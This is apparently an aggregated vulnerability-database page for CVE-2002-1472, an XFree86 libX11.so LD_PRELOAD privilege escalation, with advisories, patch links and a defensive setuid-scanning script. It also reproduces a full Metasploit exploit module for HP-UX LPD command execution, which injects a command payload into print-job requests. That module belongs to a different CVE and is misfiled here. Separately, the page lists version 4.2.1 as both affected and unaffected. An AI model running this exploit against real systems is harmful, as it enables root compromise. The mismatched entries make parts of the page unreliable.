CVE-2002-1472
CVSS 7.2
Published: 2003-03-03 00:00:00
Revised: 2008-09-05 16:30:41

[Original] Untrusted search path vulnerability in libX11.so in xfree86, when used in setuid or setgid programs, allows local users to gain root privileges via a modified LD_PRELOAD environment variable that points to a malicious module.


[CNNVD] XFree86 libX11.so Local Privilege Escalation Vulnerability (CNNVD-200303-001)

        
        The XFree86 package contains a number of programs and the libraries required to run the X server, including the libX11.so library.
        The libX11.so library in the XFree86 package does not handle paths correctly when loading other libraries; a local attacker can exploit this flaw to escalate privileges.
        When libX11.so dynamically loads other libraries, the environment variable that names the load path is controlled by the executing user, and setuid programs linked against libX11.so perform the same operation when they load other libraries. This allows a local user to execute arbitrary code under a different UID by causing a malicious library to be loaded, resulting in privilege escalation.
        <*Link: http://www.suse.com/de/support/security/2002_032_xf86.html
        *>

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:xfree86_project:x11r6:4.2.0
cpe:/a:xfree86_project:x11r6:4.1.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1472
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1472
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-001
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5735
(VENDOR_ADVISORY)  BID  5735
http://www.iss.net/security_center/static/10137.php
(VENDOR_ADVISORY)  XF  xfree86-x11-program-execution(10137)
http://archives.neohapsis.com/archives/linux/suse/2002-q3/1116.html
(VENDOR_ADVISORY)  SUSE  SuSE-SA:2002:032
http://www.redhat.com/support/errata/RHSA-2003-067.html
(UNKNOWN)  REDHAT  RHSA-2003:067
http://www.redhat.com/support/errata/RHSA-2003-066.html
(UNKNOWN)  REDHAT  RHSA-2003:066
http://www.osvdb.org/11922
(UNKNOWN)  OSVDB  11922
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000529
(UNKNOWN)  CONECTIVA  CLA-2002:529

- Vulnerability information

XFree86 libX11.so Local Privilege Escalation Vulnerability
Severity: High  Type: Design error
2003-03-03 00:00:00 2006-11-06 00:00:00
Attack vector: Local

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Use the 'ldd' tool to determine whether setuid programs are dynamically linked against libX11.so; if they are, remove the setuid bit with chmod u-s.
        Vendor patches:
        S.u.S.E.
        --------
        S.u.S.E. has released a security advisory (SuSE-SA:2002:032) and the corresponding patches:
        SuSE-SA:2002:032:xf86
        Link:
        http://www.suse.com/de/support/security/2002_032_xf86.html

        Patch downloads:
        i386 Intel Platform:
        SuSE-8.0
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/x1/xshared-4.2.0-174.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/x2/xdevel-4.2.0-174.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/xf86-4.2.0-174.src.rpm
        Patch installation:
        Install the files with the command "rpm -Fhv file.rpm". Afterwards, if the rsync service is started by inetd, send a signal to the inetd process to restart it; if rsync is started with "rsync --daemon", run that command again to restart the rsync service.
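The workaround above (find setuid programs that link libX11.so with ldd, then drop their setuid bit) can be scripted. The following is an added example written for this page, not code from CNNVD or SuSE; it assumes a Linux system with POSIX find(1) and a glibc-style ldd(1), and the library name and directories scanned (LIB, the /usr/bin ... /sbin list) are assumptions you should adjust for your host. The text-matching step is separated from the filesystem scan so it can be checked on constructed ldd output.

```shell
#!/bin/sh
# Added example: locate setuid/setgid binaries that dynamically link the
# library named in LIB (default libX11.so), as the CNNVD workaround describes.
# Assumption: ldd prints one "  libname.so.N => /path (0x...)" line per dependency.

LIB="${LIB:-libX11.so}"

# ldd_output_links_lib LDD_OUTPUT LIBNAME
# Returns 0 when the captured ldd output lists LIBNAME as a dependency.
ldd_output_links_lib() {
    printf '%s\n' "$1" | grep -q -- "^[[:space:]]*$2"
}

# binary_links_lib PATH LIBNAME
# Runs ldd on one file. Static binaries, scripts and missing files make ldd
# fail; those are treated as "does not link LIBNAME" (return 1).
binary_links_lib() {
    out=$(ldd "$1" 2>/dev/null) || return 1
    ldd_output_links_lib "$out" "$2"
}

# scan_setuid DIR...
# Prints every setuid or setgid regular file under DIRs that links LIB.
# -xdev keeps the scan on one filesystem so network mounts are not walked.
scan_setuid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if binary_links_lib "$f" "$LIB"; then
            printf '%s\n' "$f"
        fi
    done
}

# Usage: ./check_setuid_x11.sh --scan
# Review each listed path; the advisory's mitigation is then "chmod u-s <path>"
# (and g-s for setgid files) for programs that do not need elevated privileges.
if [ "${1:-}" = "--scan" ]; then
    scan_setuid /usr/bin /usr/sbin /usr/X11R6/bin /bin /sbin
fi
```

Review the list before removing any bits: some X clients (for example xterm on older systems) were setuid for legitimate reasons, and dropping the bit changes their behaviour, so the right long-term fix is the vendor update rather than the chmod.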

- Vulnerability information (F82228)

HP-UX LPD Command Execution (PacketStormID:F82228)
2009-10-27 00:00:00
H D Moore  
exploit,overflow,arbitrary,root
hpux
CVE-2002-1472

This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP-UX LPD Command Execution',
			'Description'    => %q{
				This exploit abuses an unpublished vulnerability in the
				HP-UX LPD service. This flaw allows an unauthenticated
				attacker to execute arbitrary commands with the privileges
				of the root user. The LPD service is only exploitable when
				the address of the attacking system can be resolved by the
				target. This vulnerability was silently patched with the
				buffer overflow flaws addressed in HP Security Bulletin
				HPSBUX0208-213.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-1473'],
					[ 'OSVDB', '9638'],
					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

				],
			'Platform'       => ['unix', 'hpux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 200,
					'DisableNops' => true,
					'BadChars'    => "\x00\x09\x20\x2f",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},			
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# The job ID is squashed down to three decimal digits
		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# Connect to the LPD service
		connect
		
		print_status("Sending our job request with embedded command string...")
		# Send the job request with the encoded command
		sock.put(
			"\x02" + rand_text_alphanumeric(3) + jid +
			"`" + payload.encoded + "`\n"
		)
		
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our job request")
			return
		end

		print_status("Sending our fake control file...")		
		sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our control file")
			return
		end
		
		print_status("Forcing an error and hijacking the cleanup routine...")
		
		begin
			sock.put(rand_text_alphanumeric(16384))
			disconnect
		rescue
		end
		
	end

end

    

- Vulnerability information

11922
XFree86 libX11.so LD_PRELOAD Privilege Escalation
Local Access Required / Input Manipulation
Loss of Integrity

- Vulnerability description

A local overflow exists in XFree86. The libX11.so library fails to securely check the LD_PRELOAD environment variable while running a SUID executable. As a result, an attacker can use his own library to poison a program that uses dynamically loadable libraries. By setting LD_PRELOAD, an attacker can execute arbitrary code and gain privileges, resulting in a loss of integrity.

- Timeline

2002-09-18 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

XFree86 libX11.so Local Privilege Escalation Vulnerability
Class: Design Error  BID: 5735
Remote: No  Local: Yes
Published: 2002-09-18 12:00:00  Updated: 2009-07-11 05:06:00
Credit: Advisory released by SuSE.

- Affected program versions

XFree86 X11R6 4.2.0
+ Conectiva Linux Enterprise Edition 1.0
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
XFree86 X11R6 4.1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
S.u.S.E. Linux 8.0
RedHat XFree86-Xvfb-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Xnest-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xfs-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xdm-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xauth-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-twm-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-truetype-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-tools-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Mesa-libGLU-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Mesa-libGL-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-libs-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-9-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-9-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-2-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-2-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-15-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-15-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-font-utils-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-doc-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-devel-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-cyrillic-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-base-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
XFree86 X11R6 4.2.1
+ Immunix Immunix OS 7.3
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 7.3
+ Slackware Linux 8.1

- Unaffected program versions

XFree86 X11R6 4.2.1
+ Immunix Immunix OS 7.3
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 7.3
+ Slackware Linux 8.1

- Vulnerability discussion

SuSE has reported a vulnerability in XFree86 that may affect other systems which include it. The xf86 package, which is included in the Suse Linux distribution, contains various programs and libraries that are necessary for X server to run. The package includes the libX11.so library.

When libX11.so is called it will dynamically load libraries via a path defined in an environment variable that is controlled by the executing user. libX11.so fails to disable the variable when the process is setuid, allowing malicious libraries to be loaded. Attackers may cause arbitrary code to be executed with escalated privileges.

- Exploit

No exploit is required.

- Solution

Red Hat has released an advisory (RHSA-2003:064-01) to address this issue. Details on obtaining and applying fixes are contained in the referenced advisory.

Red Hat has released an advisory (RHSA-2003:067-01) containing details that address this issue. Fixes are available below.

Upgrades available:


RedHat XFree86-ISO8859-9-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-xdm-4.2.0-72.i386.rpm

RedHat XFree86-xfs-4.2.0-72.i386.rpm

RedHat XFree86-base-fonts-4.2.0-72.i386.rpm

RedHat XFree86-Xnest-4.2.0-72.i386.rpm

RedHat XFree86-cyrillic-fonts-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-15-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-libs-4.2.0-72.i386.rpm

RedHat XFree86-tools-4.2.0-72.i386.rpm

RedHat XFree86-devel-4.2.0-72.i386.rpm

RedHat XFree86-Xvfb-4.2.0-72.i386.rpm

RedHat XFree86-truetype-fonts-4.2.0-72.i386.rpm

RedHat XFree86-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-9-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-Mesa-libGLU-4.2.0-72.i386.rpm

RedHat XFree86-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-xauth-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-2-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-twm-4.2.0-72.i386.rpm

RedHat XFree86-Mesa-libGL-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-15-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-doc-4.2.0-72.i386.rpm

RedHat XFree86-font-utils-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-2-75dpi-fonts-4.2.0-72.i386.rpm

XFree86 X11R6 4.2.0

S.u.S.E. Linux 8.0

- References

     

     

    About the SCAP Chinese Community

    The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

    Copyright notice

    CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.